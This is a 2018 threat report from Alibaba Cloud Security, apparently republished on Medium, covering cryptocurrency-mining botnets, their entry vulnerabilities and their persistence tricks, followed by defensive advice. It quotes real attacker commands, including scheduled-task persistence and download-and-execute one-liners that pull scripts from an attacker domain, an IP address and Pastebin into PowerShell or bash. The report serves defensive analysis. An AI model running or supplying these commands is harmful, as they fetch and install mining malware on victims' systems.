Alibaba Cloud Security: 2018 Cryptocurrency Mining Hijacker Report

Key Takeaways

  • Popular 0-day and N-day vulnerabilities have become the entry point for malicious cryptocurrency miners. To avoid it, users must fix 0-day vulnerabilities in a short period of time.
  • Non-web-based applications exposed to public networks are the favorite targets of malicious cryptocurrency miners.
  • Cryptocurrency mining hijackers widely exploit brute-force attacks to distribute, where weak passwords still constitute the biggest loophole across the Internet.
  • Mining trojans generally spread as worms and maximize their value by persisting on the compromised hosts.
  • Cryptocurrency mining hijackers avoid security analysis and trail tracing through disguised processes, shell-protection, code obfuscation, and private mining pools (via proxy).

Attack Trend Analysis

Popular 0-day and N-day vulnerabilities have become the “entries” for miners

Non-web-based applications exposed to public networks are the favorite targets

Cryptocurrency mining hijackers widely exploit brute-force attacks

Malicious Behaviors

Mining Trojans are generally spread as worms

Cryptocurrency mining hijackers maximize their value by persisting on the compromised hosts

cmd /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c C:\Windows\ime\scvsots.exe"
cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F"
cmd /c echo powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http[:]//stafftest.spdns[.]eu:8000/mate6.ps1')}" >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR "%temp%\y1.bat" &&SCHTASKS /run /TN yastcat<c/ode>

Cryptocurrency mining hijackers disguise to avoid security analysis and trail tracing

Overview of Major Cryptocurrency Miner Hijackers

DDG

  • OrientDB vulnerability (in the early stage)
  • Unauthorized access to ApsaraDB for Redis
  • SSH weak passwords
  • The malware uses multiple IP addresses such as 104.236.156.211 for malicious script distribution.
  • The botnet usually uses the CC ports 8000 or 8443.
/bin/sh -c curl -L http://104.236.156.211:8000/i.sh | sh

8220

  • WebLogic XMLDecoder deserialization vulnerability
  • Drupal remote code execution vulnerability
  • JBoss deserialization command execution vulnerability
  • CouchDB combination vulnerability
  • Unauthorized access to ApsaraDB for Redis
  • Unauthorized access to Hadoop Yarn
  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware decrypts the miner in the data segment, selects a zombie process, and injects the miner into the zombie process for mining.

Mykings (a.k.a the Hidden)

  • 3306 MySQL
  • 135 WMI
  • 22 SSH
  • 445 IPC
  • 23 Telnet
  • 80 Web
  • 3389 RDP
  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • Working with Bootkit, Mykings modifies MBR Bootkit after trojans are implanted.

Bulehero

RDPMiner

  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware disables Windows firewalls and adds startup items.
  • The malware adds malicious user accounts.

JbossMiner

  • JBoss deserialization vulnerability (primary)
  • Struts2 remote command execution vulnerability
  • EternalBlue vulnerability

WannaMine

  • EternalBlue vulnerability
  • RDP weak passwords or multiple hosts with the same password
  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware dumps user passwords from memory.

Kworkerd

  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware replaces the /etc/ld.so.preload file and hijacks the Linux system functions through preloading, so that top, ps, and other commands cannot detect mining processes.
  • The botnet uses Pastebin as the file distribution platform.
(curl -fsSL https://pastebin.com/raw/uuYVPLXd||wget -q -O- https://pastebin.com/raw/uuYVPLXd)|base64 -d|/bin/bash

DockerKiller

  • The attacker exploits vulnerabilities to download, extract, and run multiple malicious programs that have scanning, mining, and other functions.
  • The malware disables Windows firewalls.
  • The malware adds startup items.
  • The malware adds malicious user accounts.

Security Recommendations

  • The weakest link in a security system is the user, and the most serious security issues are often a consequence of laziness. For instance, weak passwords and brute-force cracking account for 50% of mining activities. Security awareness education is essential for enterprises and individuals.
  • The 0-day vulnerability fixing period is getting shorter, so enterprises need to improve the efficiency of their emergency vulnerability responses. On the one hand, they should actively update application systems. On the other hand, they should pay attention to product security announcements and make the corresponding upgrades in a timely manner. They can also purchase fully managed security services to improve their security levels.
  • With elastic computing resources in the cloud, the risks to some non-web network applications are also increasing. Security O&M personnel should focus on the security risks associated with non-web applications, or enterprises should purchase firewall products with IPS functions to protect against 0-day vulnerabilities right away.

References

  1. Mykings’ Latest Mining Activities Are Exposedhttps://x.threatbook.cn/nodev4/vb4/article?threatInfoID=936
  2. Mykings: The Most Active Network Hacker Ganghttps://www.huorong.cn/info/150097083373.html
  3. DDG Targets Database Servers, Earning Revenues of Nearly RMB 8 Millionhttp://www.4hou.com/technology/11770.html
  4. Bulehero Again Exploits EternalBlue to Spread in Enterprise Internal Networkshttps://www.freebuf.com/column/180544.html
  5. JbossMiner Mining Analysis https://xz.aliyun.com/t/2189
  6. Kworkerd Mining Analysis https://www.anquanke.com/post/id/159497
  7. Threat Hunting, the Investigation of Fileless Malware Attacks https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/
  8. Cryptomining: Harmless Nuisance or Disruptive Threat? https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/
  9. Traceability Analysis on Suspected “8220” in Chinahttps://ti.360.net/blog/articles/8220-mining-gang-in-china/
  10. http://ju.outofmemory.cn/entry/354000

--

--

--

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Ambulance Rescue Race Hack Free Resources Generator

The Equifax Hack: We Need to Better Regulate Credit Reporting

Lost Windows Password? Try This.

Our plan to restart the bridge

Hack The Box — ScriptKiddie Writeup

A Network That Networks — Part 2: Deployment Usage and Expansion

Supersingular Isogeny Diffie-Hellman for Key Generation

Dark Web Market Places and Stolen Cards

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alibaba Cloud

Alibaba Cloud

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

More from Medium

Roadmap to the world of networking and network security

SaaS Misconfiguration Detection

How does kubeconfig works with aws eks get-token ?

Introducing Pangea: Security Services and APIs for App Builders